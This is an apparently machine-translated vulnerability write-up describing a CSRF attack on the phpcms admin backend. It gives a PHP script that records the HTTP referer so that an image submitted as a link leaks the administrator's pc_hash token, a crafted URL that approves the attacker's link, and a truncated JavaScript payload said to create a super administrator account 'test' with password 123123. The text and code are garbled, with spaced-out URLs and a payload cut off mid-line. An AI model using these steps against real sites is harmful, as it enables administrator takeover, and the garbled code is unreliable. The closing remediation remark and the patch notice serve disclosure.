As we all know, after logging on to the background with phpcms, there is a pc_hash as the TOKEN to prevent CSRF attacks, and how can I use a combination of techniques to perform CSRF attacks. After phpcms is installed, you can apply for links by default. There are two types of links: text links and image links. The image link. When the Administrator reviews the image, the image is directly displayed in the background. The background url contains the pc_hash, so we can find this pc_hash In the referer of the image ~~ Why? The method is as follows: first, I wrote a script for obtaining referer locally:
<?php$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';file_put_contents('referer.txt', $referer);?>
Then, use this script as the image address to apply for a friend Link: When the Administrator accesses the "Friendship link" function in the background, I have already stolen its pc_hash: in practice, we can also make this look a little bit. For example, if you use php to output a real logo, not only does the pc_hash get, but it is also like a request to actually apply for a friend chain. Now I have obtained a referer locally: So what can I do with pc_hash? Of course it is CSRF. Here is a simple example. I can construct the following link: http: // localhost/phpcms/index. php? M = link & c = link & a = check & linkid = 4 & pc_hash = lrP5dK can be viewed as an image spoofing administrator, so that the link of id = 4 can be reviewed and approved. That is, the friend chain I just applied. Let's try again.
Gum = function () {var u = {'version': '000000', 'domain ':' {domain} ', 'backinfo ':{}, 'author ':' https://github.com/quininer/gum '}; U. e = function (code) {try {return eval (code)} catch (e) {return ''}; u. name = function (names) {return document. getElementsByTagName (names) ;}; u.html = function () {return u. name ('html ') [0] | document. write ('
Modify pc_hash to the pc_hash obtained for you, and then place the above Code on any html page (without any domain name) to trick the Administrator into accessing the site. In this way, you can add a user name named test to the target site, super Administrator account with a password of 123123:
Solution:No good suggestions. Do not put pc_hash in the url
Officially patched